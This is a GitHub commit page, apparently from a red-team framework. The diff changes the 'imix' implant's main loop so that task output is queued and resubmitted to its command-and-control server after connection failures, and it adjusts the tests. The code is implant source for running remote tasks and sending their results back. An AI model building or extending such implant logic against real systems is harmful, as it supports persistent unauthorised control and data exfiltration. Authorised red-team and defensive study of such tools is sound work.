Skip to content

Commit

Permalink
Persist imix output through connection failuers (#328)
Browse files Browse the repository at this point in the history
  • Loading branch information
hulto authored Oct 16, 2023
1 parent 53111f9 commit c88eb67
Showing 1 changed file with 59 additions and 22 deletions.
81 changes: 59 additions & 22 deletions implants/imix/src/main.rs
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
use std::borrow::BorrowMut;
use std::sync::mpsc::{channel, Sender, Receiver};
use std::thread;
use std::{collections::HashMap, fs};
Expand All @@ -7,7 +8,7 @@ use std::path::Path;
use std::time::Instant;
use chrono::{Utc, DateTime};
use clap::{Command, arg};
use anyhow::{Result, Error};
use anyhow::{Result, Error, Context};
use tokio::task::{self, JoinHandle};
use tokio::time::Duration;
use eldritch::{eldritch_run,EldritchPrintHandler};
Expand Down Expand Up @@ -170,15 +171,20 @@ fn get_os_pretty_name() -> Result<String> {
}

// Async handler for port scanning.
async fn main_loop(config_path: String, run_once: bool) -> Result<()> {
async fn main_loop(config_path: String, loop_count_max: Option<i32>) -> Result<()> {
let debug = false;
let mut loop_count: i32 = 0;
let version_string = "v0.1.0";
let auth_token = "letmeinnn";
let config_file = File::open(config_path)?;
let imix_config: imix::Config = serde_json::from_reader(config_file)?;


// This hashmap tracks all tasks by their ID (key) and a tuple value: (future, channel_reciever)
let mut all_exec_futures: HashMap<String, ExecTask> = HashMap::new();
// This hashmap tracks all tasks output
let mut all_task_res_map: HashMap<String, Vec<SubmitTaskResultInput>> = HashMap::new();


let principal = match get_principal() {
Ok(username) => username,
Expand Down Expand Up @@ -307,15 +313,24 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> {

// :clap: :clap: make new map!
let mut running_exec_futures: HashMap<String, ExecTask> = HashMap::new();
let mut running_task_res_map: HashMap<String, Vec<SubmitTaskResultInput>> = all_task_res_map.clone();

if debug { println!("[{}]: Checking task status", (Utc::now().time() - start_time).num_milliseconds()); }
// Check status & send response
for exec_future in all_exec_futures.into_iter() {
if debug { println!("[{}]: Task # {} is_finished? {}", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0, exec_future.1.future_join_handle.is_finished()); }
let mut res: Vec<String> = vec![];
// Loop over each line of output from the task.
let task_id = exec_future.0;
if debug { println!("[{}]: Task # {} is_finished? {}", (Utc::now().time() - start_time).num_milliseconds(), task_id, exec_future.1.future_join_handle.is_finished()); }

// If the task doesn't exist in the map add a vector for it.
if !running_task_res_map.contains_key(&task_id) {
running_task_res_map.insert(task_id.clone(), vec![]);
}

let mut task_channel_output: Vec<String> = vec![];

// Loop over each line of output from the task and append it the the channel output.
loop {
if debug { println!("[{}]: Task # {} recieving output", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0); }
if debug { println!("[{}]: Task # {} recieving output", (Utc::now().time() - start_time).num_milliseconds(), task_id); }
let new_res_line = match exec_future.1.print_reciever.recv_timeout(Duration::from_millis(100)) {
Ok(local_res_string) => {
local_res_string
Expand All @@ -330,39 +345,61 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> {
},
};
// let appended_line = format!("{}{}", res.to_owned(), new_res_line);
res.push(new_res_line);
// Send task response
task_channel_output.push(new_res_line);
}

let task_is_finished = exec_future.1.future_join_handle.is_finished();
let task_response_exec_finished_at = match task_is_finished {
true => Some(Utc::now()),
false => None,
};
// If the task is finished or there's new data send a task_result.
if task_is_finished || res.len() > 0 {

// If the task is finished or there's new data queue a new task result.
if task_is_finished || task_channel_output.len() > 0 {
let task_response = SubmitTaskResultInput {
task_id: exec_future.1.graphql_task.id.clone(),
exec_started_at: exec_future.1.start_time,
exec_finished_at: task_response_exec_finished_at,
output: res.join("\n"),
output: task_channel_output.join("\n"),
error: None,
};
let res = tavern_client.submit_task_result(task_response).await;
let _submit_task_result = match res {
Ok(local_val) => local_val,
Err(local_err) => if debug { println!("Failed to submit task resluts:\n{}", local_err.to_string()) },
};
let mut tmp_res_list = running_task_res_map.get(&task_id).context("Failed to get task output by ID")?.clone();
tmp_res_list.push(task_response);
running_task_res_map.insert(task_id.clone(), tmp_res_list);
}

// Only re-insert the runnine exec futures
// Only re-insert the still running exec futures
if !exec_future.1.future_join_handle.is_finished() {
running_exec_futures.insert(exec_future.0, exec_future.1);
running_exec_futures.insert(task_id, exec_future.1);
}
}

// Iterate over queued task results and send them back to the server
for (task_id, task_res) in running_task_res_map.clone().into_iter() {
for task_response in task_res {
let res = tavern_client.submit_task_result(task_response).await;
let _submit_task_result = match res {
Ok(local_val) => {
running_task_res_map.remove(&task_id);
local_val
},
Err(local_err) => if debug { println!("Failed to submit task resluts:\n{}", local_err.to_string()) },
};
}

}

// change the reference! This is insane but okay.
all_exec_futures = running_exec_futures;
if run_once { return Ok(()); };
all_task_res_map = running_task_res_map.clone();

// Debug loop tracker
if let Some(count_max) = loop_count_max {
loop_count += 1;
if loop_count >= count_max {
return Ok(());
}
}
}
}

Expand Down Expand Up @@ -408,7 +445,7 @@ pub fn main() -> Result<(), imix::Error> {
}

if let Some(config_path) = matches.value_of("config") {
match runtime.block_on(main_loop(config_path.to_string(), false)) {
match runtime.block_on(main_loop(config_path.to_string(), None)) {
Ok(_) => {},
Err(error) => eprintln!("Imix main_loop exited unexpectedly with config: {}\n{}", config_path.to_string(), error),
}
Expand Down Expand Up @@ -596,7 +633,7 @@ print("main_loop_test_success")"#.to_string(),

// Define a future for our execution task
let start_time = Utc::now().time();
let exec_future = main_loop(path_new, true);
let exec_future = main_loop(path_new, Some(1));
let _result = runtime.block_on(exec_future).unwrap();
let end_time = Utc::now().time();
let diff = (end_time - start_time).num_milliseconds();
Expand Down Expand Up @@ -688,7 +725,7 @@ print("main_loop_test_success")"#.to_string(),
.build()
.unwrap();

let exec_future = main_loop(path_new, true);
let exec_future = main_loop(path_new, Some(1));
let _result = runtime.block_on(exec_future)?;
assert!(true);
Ok(())
Expand Down

0 comments on commit c88eb67

Please sign in to comment.